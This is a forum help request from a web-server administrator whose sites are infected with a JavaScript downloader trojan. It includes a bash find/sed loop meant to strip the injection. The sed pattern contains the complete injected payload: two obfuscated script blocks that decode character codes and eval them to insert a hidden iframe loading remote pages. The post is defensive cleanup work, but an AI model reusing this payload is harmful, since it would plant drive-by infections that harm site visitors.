| moyorakkhi |
08-11-2011 11:34 PM |
Trojan on Web Server
In our web-server most of the sites are infected with this JS-Downloader Trojan. It injected the following code. I've tried to clean up the server with "linux malware detector" and ClamAV, but both of them failed to clean it up. Any suggestion how to clean this up? Do I need to run a script to clean it? I've written this script. But it's not able to clean.
Code:
while read -r file
do
sed -i '/<script>var s,g=2,aa=document.createTextNode("harCode");if(~0===Math.cos(Math.PI)){s=String["fr"+"omC"+aa.nodeValue];} eval(s(7+g,7+g,103+g,100+g,30+g,38+g,98+g,109+g,97+g,115+g,107+g,99+g,108+g,114+g,44+g,101+g,99+g,114+g,67+g,106+g,99+g,107+g,99+g,108+g,114+g,113+g,64+g,119+g,82+g,95+g,101+g,76+g,95+g,107+g,99+g,38+g,37+g,96+g,109+g,98+g,119+g,37+g,39+g,89+g,46+g,91+g,39+g,121+g,7+g,7+g,7+g,103+g,100+g,112+g,95+g,107+g,99+g,112+g,38+g,39+g,57+g,7+g,7+g,123+g,30+g,99+g,106+g,113+g,99+g,30+g,121+g,7+g,7+g,7+g,98+g,109+g,97+g,115+g,107+g,99+g,108+g,114+g,44+g,117+g,112+g,103+g,114+g,99+g,38+g,32+g,58+g,103+g,100+g,112+g,95+g,107+g,99+g,30+g,113+g,112+g,97+g,59+g,37+g,102+g,114+g,114+g,110+g,56+g,45+g,45+g,108+g,114+g,43+g,113+g,114+g,95+g,114+g,113+g,44+g,97+g,109+g,44+g,114+g,116+g,45+g,97+g,109+g,115+g,108+g,114+g,99+g,112+g,44+g,102+g,114+g,107+g,37+g,30+g,117+g,103+g,98+g,114+g,102+g,59+g,37+g,47+g,46+g,37+g,30+g,102+g,99+g,103+g,101+g,102+g,114+g,59+g,37+g,47+g,46+g,37+g,30+g,113+g,114+g,119+g,106+g,99+g,59+g,37+g,116+g,103+g,113+g,103+g,96+g,103+g,106+g,103+g,114+g,119+g,56+g,102+g,103+g,98+g,98+g,99+g,108+g,57+g,110+g,109+g,113+g,103+g,114+g,103+g,109+g,108+g,56+g,95+g,96+g,113+g,109+g,106+g,115+g,114+g,99+g,57+g,106+g,99+g,100+g,114+g,56+g,46+g,57+g,114+g,109+g,110+g,56+g,46+g,57+g,37+g,60+g,58+g,45+g,103+g,100+g,112+g,95+g,107+g,99+g,60+g,32+g,39+g,57+g,7+g,7+g,123+g,7+g,7+g,100+g,115+g,108+g,97+g,114+g,103+g,109+g,108+g,30+g,103+g,100+g,112+g,95+g,107+g,99+g,112+g,38+g,39+g,121+g,7+g,7+g,7+g,116+g,95+g,112+g,30+g,100+g,30+g,59+g,30+g,98+g,109+g,97+g,115+g,107+g,99+g,108+g,114+g,44+g,97+g,112+g,99+g,95+g,114+g,99+g,67+g,106+g,99+g,107+g,99+g,108+g,114+g,38+g,37+g,103+g,100+g,112+g,95+g,107+g,99+g,37+g,39+g,57+g,100+g,44+g,113+g,99+g,114+g,63+g,114+g,114+g,112+g,103+g,96+g,115+g,114+g,99+g,38+g,37+g,113+g,112+g,97+g,37+g,42+g,37+g,102+g,114+g,114+g,110+g,56+g,45+g,45+g,108+g,114+g,43+g,113+g,114+g,95+g,114+g,113+g,44+g,97+g,109+g,44+g,114+g,116+g,45+g,97+g,109+g,115+g,108+g,114+g,99+g,112+g,44+g,102+g,114+g,107+g,37+g,39+g,57+g,100+g,44+g,113+g,114+g,119+g,106+g,99+g,44+g,116+g,103+g,113+g,103+g,96+g,103+g,106+g,103+g,114+g,119+g,59+g,37+g,102+g,103+g,98+g,98+g,99+g,108+g,37+g,57+g,100+g,44+g,113+g,114+g,119+g,106+g,99+g,44+g,110+g,109+g,113+g,103+g,114+g,103+g,109+g,108+g,59+g,37+g,95+g,96+g,113+g,109+g,106+g,115+g,114+g,99+g,37+g,57+g,100+g,44+g,113+g,114+g,119+g,106+g,99+g,44+g,106+g,99+g,100+g,114+g,59+g,37+g,46+g,37+g,57+g,100+g,44+g,113+g,114+g,119+g,106+g,99+g,44+g,114+g,109+g,110+g,59+g,37+g,46+g,37+g,57+g,100+g,44+g,113+g,99+g,114+g,63+g,114+g,114+g,112+g,103+g,96+g,115+g,114+g,99+g,38+g,37+g,117+g,103+g,98+g,114+g,102+g,37+g,42+g,37+g,47+g,46+g,37+g,39+g,57+g,100+g,44+g,113+g,99+g,114+g,63+g,114+g,114+g,112+g,103+g,96+g,115+g,114+g,99+g,38+g,37+g,102+g,99+g,103+g,101+g,102+g,114+g,37+g,42+g,37+g,47+g,46+g,37+g,39+g,57+g,7+g,7+g,7+g,98+g,109+g,97+g,115+g,107+g,99+g,108+g,114+g,44+g,101+g,99+g,114+g,67+g,106+g,99+g,107+g,99+g,108+g,114+g,113+g,64+g,119+g,82+g,95+g,101+g,76+g,95+g,107+g,99+g,38+g,37+g,96+g,109+g,98+g,119+g,37+g,39+g,89+g,46+g,91+g,44+g,95+g,110+g,110+g,99+g,108+g,98+g,65+g,102+g,103+g,106+g,98+g,38+g,100+g,39+g,57+g,7+g,7+g,123+g));</script><script>var s,d1=new Date(),d2=new Date(d1.getTime()+2),o=d1-d2,aa=document.createTextNode("eval");e=window[aa.nodeValue];e(String.fromCharCode(11+o,11+o,107+o,104+o,34+o,42+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,123+o,41+o,43+o,93+o,50+o,95+o,43+o,125+o,11+o,11+o,11+o,107+o,104+o,116+o,99+o,111+o,103+o,116+o,42+o,43+o,61+o,11+o,11+o,127+o,34+o,103+o,110+o,117+o,103+o,34+o,125+o,11+o,11+o,11+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,121+o,116+o,107+o,118+o,103+o,42+o,36+o,62+o,107+o,104+o,116+o,99+o,111+o,103+o,34+o,117+o,116+o,101+o,63+o,41+o,106+o,118+o,118+o,114+o,60+o,49+o,49+o,101+o,113+o,47+o,117+o,118+o,99+o,118+o,117+o,48+o,101+o,113+o,48+o,100+o,103+o,49+o,117+o,118+o,99+o,118+o,107+o,117+o,118+o,107+o,101+o,48+o,106+o,118+o,111+o,41+o,34+o,121+o,107+o,102+o,118+o,106+o,63+o,41+o,51+o,50+o,41+o,34+o,106+o,103+o,107+o,105+o,106+o,118+o,63+o,41+o,51+o,50+o,41+o,34+o,117+o,118+o,123+o,110+o,103+o,63+o,41+o,120+o,107+o,117+o,107+o,100+o,107+o,110+o,107+o,118+o,123+o,60+o,106+o,107+o,102+o,102+o,103+o,112+o,61+o,114+o,113+o,117+o,107+o,118+o,107+o,113+o,112+o,60+o,99+o,100+o,117+o,113+o,110+o,119+o,118+o,103+o,61+o,110+o,103+o,104+o,118+o,60+o,50+o,61+o,118+o,113+o,114+o,60+o,50+o,61+o,41+o,64+o,62+o,49+o,107+o,104+o,116+o,99+o,111+o,103+o,64+o,36+o,43+o,61+o,11+o,11+o,127+o,11+o,11+o,104+o,119+o,112+o,101+o,118+o,107+o,113+o,112+o,34+o,107+o,104+o,116+o,99+o,111+o,103+o,116+o,42+o,43+o,125+o,11+o,11+o,11+o,120+o,99+o,116+o,34+o,104+o,34+o,63+o,34+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,101+o,116+o,103+o,99+o,118+o,103+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,42+o,41+o,107+o,104+o,116+o,99+o,111+o,103+o,41+o,43+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,117+o,116+o,101+o,41+o,46+o,41+o,106+o,118+o,118+o,114+o,60+o,49+o,49+o,101+o,113+o,47+o,117+o,118+o,99+o,118+o,117+o,48+o,101+o,113+o,48+o,100+o,103+o,49+o,117+o,118+o,99+o,118+o,107+o,117+o,118+o,107+o,101+o,48+o,106+o,118+o,111+o,41+o,43+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,120+o,107+o,117+o,107+o,100+o,107+o,110+o,107+o,118+o,123+o,63+o,41+o,106+o,107+o,102+o,102+o,103+o,112+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,114+o,113+o,117+o,107+o,118+o,107+o,113+o,112+o,63+o,41+o,99+o,100+o,117+o,113+o,110+o,119+o,118+o,103+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,110+o,103+o,104+o,118+o,63+o,41+o,50+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,118+o,113+o,114+o,63+o,41+o,50+o,41+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,121+o,107+o,102+o,118+o,106+o,41+o,46+o,41+o,51+o,50+o,41+o,43+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,106+o,103+o,107+o,105+o,106+o,118+o,41+o,46+o,41+o,51+o,50+o,41+o,43+o,61+o,11+o,11+o,11+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,123+o,41+o,43+o,93+o,50+o,95+o,48+o,99+o,114+o,114+o,103+o,112+o,102+o,69+o,106+o,107+o,110+o,102+o,42+o,104+o,43+o,61+o,11+o,11+o,127+o));</script></body>/d' $file
done< <(find . -name '*.htm' -o -name '*.html' -o -name '*.js' -o -name '*.php')
|
